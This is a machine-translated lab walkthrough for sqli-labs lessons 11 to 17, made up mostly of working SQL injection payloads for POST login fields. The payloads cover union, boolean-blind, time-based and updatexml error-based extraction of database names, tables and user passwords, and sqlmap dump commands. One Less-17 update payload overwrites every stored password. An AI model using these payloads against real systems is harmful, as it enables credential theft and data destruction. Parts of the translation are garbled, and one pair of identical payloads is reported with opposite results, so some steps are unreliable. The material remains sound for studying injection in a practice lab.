Sqli-libs post injection question 11-17 actual combat

Catalog

Less-11

less-12

Less-13

Less-14

Less-15

Less-16

Less-17

Less-11

       POST ‘ Single quotation mark Injection

       Judge the display bit

uname=&passwd=' union select 1,2 -- - Confirm that the display bit is 1 and 2

       Database name and database user

uname=&passwd=' union select user(),database()-- - security and [email protected]

       Table name

uname=&passwd=' union select 1,group_concat(table_name) from information_schema.tables where table_schema="security" -- -   Confirm the table name emails,referers,uagents,users

       users Table field name

uname=&passwd=' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"-- - Confirm the field name id,username,password

       Pop field

uname=&passwd=' union select group_concat(username),group_concat(password) from users -- -   Get the account and password

less-12

       POST Double quotation mark plus ) Injection judgment

uname=&passwd=" and 1=1 -- - Report errors

uname=&passwd=") and 1=1 -- - normal

       Judge the display bit

uname=&passwd=") union select 1,2  -- -

       The rest is the same as less-1 Empathy

Less-13

       Single quotation mark double error reporting injection

uname=admin&passwd=admin') order by 2-- - Judge that the query bit is 2 position

       Judge the length of database name

uname=admin&passwd=admin') and length(database())>8 -- - Report errors

uname=admin&passwd=admin') and length(database())>7 -- - normal The database length is 8

       Determine the initial of the database name ASCII Code value

uname=admin&passwd=admin') and ascii(left(database(),1))>114 -- - normal

uname=admin&passwd=admin') and ascii(left(database(),1))>115 -- - Report errors The first letter of the description is s

       Judge the second letter of the database

uname=admin&passwd=admin') and ascii(substr(database(),2,1))>101 -- - Report errors

uname=admin&passwd=admin') and ascii(substr(database(),2,1))>100 -- - Explain that the second letter is e

       Calculate the database name in turn security

       Determine the number of data sheets

uname=admin&passwd=admin') and (select count(table_name) from information_schema.tables where table_schema="security")=4 -- - The number of 4

       Judge the first letter of the alphabet

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>100 -- - normal

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>101 -- - Report errors The initial is e

       Judge the second letter of the first table

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),2,1))>108 -- - normal

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),2,1))>109 -- - Report errors , The second letter is m

       Judge the first letter of the fourth table

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1,1))>116 -- - normal

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1,1))>117 -- - Report errors , The first letter is u

       Judge users There are several fields in the table

uname=admin&passwd=admin') and (select count(column_name) from information_schema.columns where table_schema="security" and table_name="users" )=3 -- - The number of 3

       Determine the first letter of the first field

uname=admin&passwd=admin') and ascii(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),1,1))>104 -- - normal

uname=admin&passwd=admin') and ascii(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),1,1))>105 -- - Report errors   The first letter is i

       obtain id,username,password Field

       Judge username The first letter of the first value of the field

uname=admin&passwd=admin') and ascii(substr((select username from users limit 0,1),1,1))>67 -- - normal

uname=admin&passwd=admin') and ascii(substr((select username from users limit 0,1),1,1))>68 -- - Report errors   The first letter of the description is D

       Judge user name Dumb Password

uname=admin&passwd=admin') and ascii(substr((select password from users where username="dumb"),1,1))>68 -- - Report errors

uname=admin&passwd=admin') and ascii(substr((select password from users where username="dumb"),1,1))>68 -- - normal The first letter of the description is D

       So far, the account and password are all available , Use scripts to run

       Catching the bag post The request body and data are saved as 123.txt, And use sqlmap Go for a run

sqlmap -r 123.txt --dump -T users -D security

Less-14

       And 13 similar , take post The request header and request header are saved in the text , Use sqlmap Go for a run

sqlmap -r 123.txt --dump -T users -D security --level 5 --risk 3

Less-15

       Single quotation mark blind annotation judgment

uname=admin&passwd=admin' -- - normal

uname=admin&passwd=admin“ -- - abnormal

       Judge the length of database name

uname=admin&passwd=admin' and length(database())>8 and sleep(3)-- - No pause

uname=admin&passwd=admin' and length(database())>7 and sleep(3)-- - pause 3 second , The length is 8

       Determine the initial of the database name

uname=admin&passwd=admin' and ascii(substr((database()),1,1))=115 and sleep(3)-- - The initial is s

       Remaining operations and 13 similar

       Use sqlmap The result of running

Less-16

       Double quotation mark plus ) Judge

uname=admin&passwd=admin") and sleep(3) -- - Sleeping 3 second

       The rest of the operation is the same as 15 Agreement , Also save post Data to txt Use... In the document sqlmap function

sqlmap -r 123.txt --dump -T users -D security --level 5

Less-17

       Single quotation marks update Type injection

uname=admin&passwd=admin' where 1=1 and sleep(2) -- - sleep 2 second , This operation sets all passwords to admin

       Delay Injection

uname=admin&passwd=123' and length(database())=8 and sleep(2) -- - Time delay 26 second , Because the database has 13 Data

       The remaining operations are the same as above , Because the method of delay injection will rewrite the data , So try to report an error

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- - Get the database name security

       Query table

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"),0x7e),1) -- - Get the data sheet

       Query the column name

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"),0x7e),1) -- - Get the field name

       Query the data of other tables

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(email_id) from security.emails),0x7e),1) -- -